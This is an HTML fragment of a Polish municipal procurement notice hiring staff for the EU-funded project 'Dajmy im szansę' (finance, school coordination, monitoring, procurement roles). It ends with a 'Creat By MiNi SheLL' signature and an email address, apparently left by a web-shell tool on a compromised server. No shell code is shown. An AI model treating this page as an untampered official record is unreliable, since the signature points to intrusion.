3. Rozliczanie za wykonanie przedmiotu zamówienia będzie cyklicznie, nie częściej niż raz  
    na miesiąc, na zasadach określonych we wzorze umowy. 
4. Wykonawców obowiązuje należytą staranność w wykonywaniu przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wybór personelu zarządzającego projektem Dajmy im szansę                     
                   współfinansowanego przez Unię Europejską                                                    
               ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji specjalisty d/s finansowo-księgowych  projektu 
                    Dajmy im  szansę 
 
 Do obowiązków specjalisty ds. finansowo-księgowych należy wykonanie wszystkich czynności związanych z finansowaniem wszystkich zadań związanych z projektem we  wszystkich placówkach biorących udział w realizacji projektu, a w szczególności: 
1. Rzetelne i terminowe księgowanie zdarzeń gospodarczych wynikających z realizacji
     projektu
2. Kontrola prawidłowego wystawiania rachunków, umów cywilnoprawnych, faktur;
3. Opisywanie faktur;
4. Dokonywanie płatności finansowych związanych z projektem;
5. Księgowanie dokumentów finansowych związanych z projektem oraz ich odpowiednie 
     archiwowanie;
6. Współpraca w zakresie księgowości z osobami zarządzającymi projektem oraz  z Instytucją   
     Pośredniczącą;
7. Rozliczanie projektu pod względem finansowym i sprawozdawczość związana
    z projektem (wnioski o płatność, sprawozdania, itp.).
8. Księgowanie kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków  
    kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań   
    określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego 
    w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; 
     udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
9. Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie   
     środków realizowanego projektu;
10. Przygotowanie raportów o finansowym postępie w realizacji projektu; 
11. Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich 
      wystąpienia;
12. Weryfikacja faktur pod względem formalno-rachunkowym i prawidłowości rozliczeń 
      finansowych uwzględniających wszystkie źródła finansowania;
13. Współpraca z Koordynatorem Projektu w celu zapewnienia prawidłowego przepływu 
       informacji;
14. Współpraca z organami kontrolującymi 

Opis dodatkowy: 
1. Wykonawca zobowiązuje się do osobistego wykonania pracy, nie może powierzyć całości   
     lub części pracy określonej w umowie  do wykonania przez  osoby trzecie beż pisemnej   
     zgody Zamawiającego. 
2. Z wykonawcą będzie podpisana umowa cywilno-prawna. 
3. Rozliczanie za wykonanie przedmiotu zamówienia będzie cyklicznie, nie częściej niż raz  
    na miesiąc, na zasadach określonych we wzorze umowy. 
4. Wykonawców obowiązuje należytą staranność w wykonywaniu przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wybór personelu zarządzającego projektem Dajmy im szansę                     
                   współfinansowanego przez Unię Europejską                                                    
               ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego projektu Dajmy im szansę - 2 osoby
 
Do obowiązków koordynatorów szkolnych należy wykonanie wszystkich czynności związanych z nadzorowaniem zadań związanych z projektem w placówkach oświatowych na terenie gminy Lipnica,  a w szczególności: 
1. Zarządzanie i nadzorowanie nad realizacją projektu w zakresie merytorycznym oraz   
     finansowym w danej szkole,
2. Organizacja i odpowiedzialność za prawidłowy przebieg zajęć w danej szkole,
3. Czuwanie nad realizacją wszystkich zadań projektu w danej szkole na wszystkich jego 
     etapach zgodnie z harmonogramem,  budżetem i zapisami zawartymi we wniosku, ze   
     szczególnym uwzględnieniem ich jakości, rzetelności i terminowości,
4. Kontrola realizacji projektu w danej szkole, sprawozdawczość,
5. Monitoring i kontrola zajęć w szkołach pod względem merytorycznym, badanie
     wzrostu wiedzy w danej szkole, rekrutacja uczestników do projektu 
6. Uczestnictwo w przygotowywaniu wszystkich dokumentów wymaganych
    do wniosków o płatność, sprawozdań okresowych i raportów wymaganych
    przez Instytucje Zarządzające dotyczących realizacji projektu w danej szkole
7. Utrzymywanie stałych kontaktów z kierownikiem projektu oraz dyrektorami szkół,    
     informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu,
    terminowe przesyłanie wszystkich wymaganych dokumentów i informacji,
    przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur,   
    standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów,
8. Weryfikacja programów nauczania pod kątem merytorycznym,
9. Obecność podczas kontroli Projektu.
10. Uczestnictwo w przygotowaniu i realizacji zamówień publicznych
      zgodnie z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.

Opis dodatkowy: 
1. Wykonawca zobowiązuje się do osobistego wykonania pracy, nie może powierzyć całości   
     lub części pracy określonej w umowie  do wykonania przez  osoby trzecie beż pisemnej   
     zgody Zamawiającego. 
2. Z wykonawcą będzie podpisana umowa cywilno-prawna. 
3. Rozliczanie za wykonanie przedmiotu zamówienia będzie cyklicznie, nie częściej niż raz  
    na miesiąc, na zasadach określonych we wzorze umowy. 
4. Wykonawców obowiązuje należytą staranność w wykonywaniu przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wybór personelu zarządzającego projektem Dajmy im szansę                    
                   współfinansowanego przez Unię Europejską                                                    
               ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Pełnienie funkcji specjalisty ds. monitoringu i ewaluacji  projektu
Dajmy im szansę
 
Do obowiązków specjalisty należy wykonywanie wszystkich czynności związanych z monitorowaniem i ewaluacją wszystkich zadań związanych z projektem, a w szczególności: 
1. Odpowiedzialność za narzędzia monitoringu i kanały komunikacji między osobami   
      realizującymi projekt,
2. Sprawozdawczość, promocja, monitoring i ewaluacja całości Projektu,
3. Uczestnictwo w przygotowywaniu wszystkich dokumentów, wniosków o płatność, 
     sprawozdań okresowych i raportów wymaganych przez Instytucje Zarządzające,
4. Utrzymywanie stałych kontaktów z kierownikiem projektu i koordynatorami szkolnymi, w    
     Zakresie monitoringu, sprawozdawczości i promocji projektu,
5. Monitorowanie na bieżąco realizacji zadań związanych z Projektem zgodnie
      z harmonogramem, budżetem i zapisami  zawartymi we wniosku
6. Obecność podczas kontroli Projektu.
7. Uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie z ustawą
    Prawo zamówień publicznych, w zakresie działań projektowych.

Opis dodatkowy: 
1. Wykonawca zobowiązuje się do osobistego wykonania pracy, nie może powierzyć całości   
     lub części pracy określonej w umowie  do wykonania przez  osoby trzecie beż pisemnej   
     zgody Zamawiającego. 
2. Z wykonawcą będzie podpisana umowa cywilno-prawna. 
3. Rozliczanie za wykonanie przedmiotu zamówienia będzie cyklicznie, nie częściej niż raz  
    na miesiąc, na zasadach określonych we wzorze umowy. 
4. Wykonawców obowiązuje należytą staranność w wykonywaniu przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wybór personelu zarządzającego projektem Dajmy im szansę                     
                   współfinansowanego przez Unię Europejską                                                    
               ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji specjalisty d/s zamówień publicznych  projektu
Dajmy im szansę
Do obowiązków specjalisty ds. zamówień publicznych  należy wykonanie wszystkich czynności związanych z przeprowadzeniem zamówień publicznych dotyczących zadań związanych z projektem, a w szczególności:
1. Przygotowanie i  przeprowadzenie zamówień publicznych zgodnie z ustawą Prawa 
     zamówień publicznych 
2. współpraca ze specjalistą ds. finansowo-księgowych i kierownikiem projektu 
Opis dodatkowy: 
1. Wykonawca zobowiązuje się do osobistego wykonania pracy, nie może powierzyć całości   
     lub części pracy określonej w umowie  do wykonania przez  osoby trzecie beż pisemnej   
     zgody Zamawiającego. 
2. Z wykonawcą będzie podpisana umowa cywilno-prawna. 
3. Rozliczanie za wykonanie przedmiotu zamówienia będzie  raz w roku   na zasadach   
    określonych we wzorze umowy. 
4. Wykonawców obowiązuje należytą staranność w wykonywaniu przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com